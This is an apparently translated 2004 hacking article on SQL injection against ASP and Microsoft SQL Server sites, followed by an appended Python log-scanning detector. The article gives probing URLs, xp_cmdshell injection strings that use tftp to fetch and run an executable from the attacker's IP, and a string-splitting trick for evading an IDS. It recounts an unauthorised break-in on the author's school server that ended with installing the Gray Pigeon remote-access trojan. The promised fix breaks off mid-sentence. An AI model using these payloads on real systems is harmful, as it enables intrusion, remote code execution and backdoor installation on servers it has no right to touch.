Author: angel
Article type: original
Release date: 2004-04-02

Introduction

SQL injection can be regarded both as a vulnerability and as an attack method. The vulnerability arises when a program handles its variables carelessly and filters the data users submit inadequately; the attack works by using data the user submits or modifies to insert SQL of the attacker's choosing into the statement the system actually executes, so that, at the least, sensitive information leaks and, at worst, the server is taken over. SQL injection is not confined to MSSQL: Access, MySQL, Oracle and Sybase can all be attacked this way. ISNO's "SQL Injection Attack Technology" is a very good article that everyone should read. Programs, however, come in all kinds: in some you can submit commands or statements by modifying the URL data, in others you cannot, so what do you do when there is no URL parameter to play with? By modifying the value inside a form field's tag you can still submit the statement we constructed. SQL injection is a very flexible technique, but our purpose is always the same: to get our statement past the checking and filtering done by the program or the IDS.

Main text
Detecting the vulnerability

For most ASP sites we do not know the program code, and no scanner can discover a SQL injection vulnerability, so we detect it by hand. Because the SQL statements we want to execute use single quotes, semicolons, commas, colons and "--", we append these symbols to the URL we are modifying, or type them into the text boxes of a form, for example:

http://localhost/show.asp?id=1'
http://localhost/show.asp?id=1;
......

From the information the page returns we judge whether a SQL injection vulnerability exists; the simplest character filtering can be judged the same way. What comes back depends on the IIS configuration. Sometimes it shows:

Microsoft OLE DB Provider for ODBC Drivers error '80040e21'
The ODBC driver does not support the requested properties.
/register/lostpass2.asp, line 15

Sometimes it shows "HTTP 500 - Internal server error", sometimes the original page is displayed normally, and it may even show "HTTP 404 - Page cannot be found". So deciding whether a vulnerability exists rests on one basic thing: experience. When I first started learning I thought our school did not have this vulnerability, but little jingle told me that the returned information is only a basis and experience matters more; with that experience the school was taken through a SQL injection vulnerability in two hours, and it also had a Telnet service... If you can get the source code you can find the problems in the ASP files by analysing them, but that requires a stronger programming foundation; pskey recently found many programs with SQL injection vulnerabilities this way, which shows how powerful it is.

Submitting data

Once we judge that an ASP program has a SQL injection vulnerability, we construct our statement to operate on the server. Usually the purpose is to control the SQL server in order to obtain information, or even the operating system, so we use xp_cmdshell, a very useful extended stored procedure for executing system commands such as dir. Different statements are submitted depending on the program; the example statements below are only a reference that explains the principle, and whether they succeed depends on the actual situation.

http://localhost/show.asp?id=1;exec master.dbo.xp_cmdshell 'dir';--
http://localhost/show.asp?id=1';exec master..xp_cmdshell 'dir'--

As mentioned earlier, when we submit such data the browser returns an error message or a 500 error, so how do we know whether the command executed successfully?
ISNO's method is to listen on a port on your own machine with nc and then submit an nslookup command whose query reaches it. I personally find that a little troublesome; TFTP has several advantages: you learn whether the command succeeded, you obtain the SQL server's IP and so its location, and it saves steps by uploading files straight to the SQL server. Running the tftp command through xp_cmdshell will be familiar from the Unicode vulnerability days. For example:

http://localhost/show.asp?id=1;exec master.dbo.xp_cmdshell 'tftp -i yourip get file.exe';--
http://localhost/show.asp?id=1';exec master..xp_cmdshell 'tftp -i yourip get file.exe'--

The submitted data does not always work; it depends on how you get around the program's checks. If you are lucky and it succeeds, the TFTP software's window shows that the file was downloaded from your machine, and the IP address in that dialog is the SQL server's IP. From that IP you can judge whether the SQL server is on the same machine as the web server, inside the local network, or a separate server; that knowledge is outside this article and is skipped. Once the command succeeds you can replace the content inside the single quotes to add users and raise privileges, but what you can do depends on which role the program uses to connect to the SQL server. Most programs and IDSs are not as easy as we imagine: even where the character filtering is imperfect, the program or IDS detects that the user submitted an extended stored procedure or a system command and automatically converts or splits characters, so the data we submitted arrives altered beyond recognition. What then? I remember spending two classes thinking about how to get around my own IDS's detection, filling half a notebook with scribbles, and coming out with a small trick, offered here as food for thought: split the command string, assign the pieces to a variable, then combine them in the variable, so the string is never recognised whole. Two examples follow:
declare @a sysname
set @a='xp_'+'cmdshell'
exec @a 'dir c:\'

declare @a sysname
set @a='xp'+'_cm'+'dshell'
exec @a 'dir c:\'

Sometimes this is not even needed: changing some characters to their ASCII codes can also succeed. I have not had the conditions to test this; if an expert has researched it, please enlighten me.

Our school's site is done quite well. Since "The Security Status of the School Campus Network" was published the school's security has improved a little and its monitoring has become almost pathological. Why do I say so? Dozens of daemons were added; it cannot be crashed or blue-screened, yet I still broke it, including its proudest hard drive protection card. (Some may ask why I attack my own school. Because as a security technology enthusiast, how else do you make your school or company secure? And it indirectly reminds the administrators, since our school's administrators are not very careful about security.) Nothing is absolute and nothing is perfect: no vulnerability could be found with a scanner, but a SQL injection vulnerability broke it easily. Looking over the whole site, there is no URL parameter, the articles are static pages, and there is only a registration system and a Dvbbs (动网) forum. The forum is the SQL version and has been modified, so it is more secure and has none of the latest vulnerabilities. Given the school's conditions the whole site is built on ASP and SQL, which lays the foundation for using a SQL injection vulnerability. The registration system has a forgotten-password function. The file is lostpass.asp, which submits to lostpass1.asp; submitting a single quote and a semicolon both produced errors, so it seemed there was no filtering, and I submitted commands such as:

exec master.dbo.xp_cmdshell 'tftp -i yourip get file.exe';--
exec master..xp_cmdshell 'tftp -i yourip get file.exe'--
xp_cmdshell 'tftp -i yourip get file.exe';--
......
I tried N statements (N > 50) and nothing showed up, so I gave up on it and looked at what other files could be used. Soon I found shownews.asp, a file that usually just displays articles and news; I guessed that the school's security awareness would not be so strong there, so, pleased with myself, I tried immediately:

http://ourschool/shownews.asp?newsid=1;
http://ourschool/shownews.asp?newsid=1'

Oh, it returned "HTTP 500 - Internal server error". Experience says the vulnerability exists. OK, enter immediately:

http://ourschool/shownews.asp?newsid=1';exec master..xp_cmdshell 'tftp -i myip get flash.exe';--
http://ourschool/shownews.asp?newsid=1;exec master..xp_cmdshell 'tftp -i myip get flash.exe';--
......
http://ourschool/shownews.asp?newsid=1;exec master.dbo.xp_cmdshell 'tftp -i myip get flash.exe';--

After these attempts I finally saw the TFTP software's window show a prompt (see the screenshot earlier). We had succeeded. My experience told me that the role connecting to the SQL database was in the sysadmin group, and because our school runs a separate server the privileges should be high, so we can execute any command simply by replacing the command in http://ourschool/shownews.asp?newsid=1;exec master.dbo.xp_cmdshell 'tftp -i myip get flash.exe';--. To end the battle I uploaded Gray Pigeon; the flash.exe transferred just now was its client :) Afterwards it turned out the database connection really was sa. What happened next I won't write; everyone knows anyway. The whole process looks very simple, as if a few statements do it. In fact, when I submitted data I had never seen the code of shownews.asp (I saw it later), and I submitted no fewer than 20 statements that did nothing, with quite a few detours; masters of SQL injection would take fewer, and this article is only a guide. After the break-in I analysed shownews.asp (thanks to pskey's guidance) and found that the file does no filtering at all; it contains this line:

rs.open "select * from news where news=" & cstr(Request("NewsID")), conn, 1, 1

so one can construct NewsID directly to launch a SQL injection attack. One fix for this file is to filter with the Replace function; see one of the following functions:
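As an added example (not part of the original article), here is a small Python detector run over constructed IIS-style log lines. It flags the probing characters and xp_cmdshell calls described in the detection and "submitting data" sections, and it folds the 'xp_'+'cmdshell' split-string form from the IDS-evasion section back together before matching, which is what a keyword filter has to do to catch that trick. The log lines, client IPs and field layout are constructed for the example, not taken from the article.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (not from the article):
# "date time client-ip method uri-stem uri-query status"
SAMPLE_LOG = """\
2004-04-02 10:01:12 10.0.0.5 GET /shownews.asp newsid=1 200
2004-04-02 10:01:40 10.0.0.5 GET /shownews.asp newsid=1' 500
2004-04-02 10:02:03 10.0.0.5 GET /shownews.asp newsid=1;exec+master..xp_cmdshell+'dir'-- 500
2004-04-02 10:03:15 10.0.0.5 GET /shownews.asp newsid=1;declare+@a+sysname+set+@a='xp'%2B'_cm'%2B'dshell'+exec+@a+'dir'-- 500
2004-04-02 10:05:00 10.0.0.9 GET /shownews.asp newsid=42 200
"""

# Metacharacters the article probes with, and the keywords it abuses.
METACHARS = re.compile(r"['\";]|--")
KEYWORDS = re.compile(r"\b(xp_\w+|sp_\w+|tftp)\b", re.I)
# Two adjacent T-SQL string literals joined by '+'.
LITERAL_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

def normalize(query: str) -> str:
    """URL-decode, then fold 'xp'+'_cm'+'dshell' back into 'xp_cmdshell'
    so the split-string evasion no longer hides the keyword."""
    text, prev = unquote_plus(query), None
    while prev != text:  # repeat until no adjacent literals remain
        prev = text
        text = LITERAL_CONCAT.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", text)
    return text

def naive_hit(query: str) -> bool:
    """Keyword match on the decoded query alone (what a simple IDS does)."""
    return KEYWORDS.search(unquote_plus(query)) is not None

def classify(query: str) -> str:
    """'clean', 'probe' (metacharacters only) or 'stored-proc'."""
    text = normalize(query)
    if KEYWORDS.search(text):
        return "stored-proc"
    if METACHARS.search(text):
        return "probe"
    return "clean"

def scan(log: str) -> list:
    """(client, uri-query, status, verdict) for every non-clean log line."""
    findings = []
    for line in log.splitlines():
        parts = line.split(" ")
        if len(parts) == 7 and classify(parts[5]) != "clean":
            findings.append((parts[2], parts[5], parts[6], classify(parts[5])))
    return findings
```

Pairing the "probe" verdict with a 500 status on the same client and page is the log-side equivalent of the error-message test the article describes.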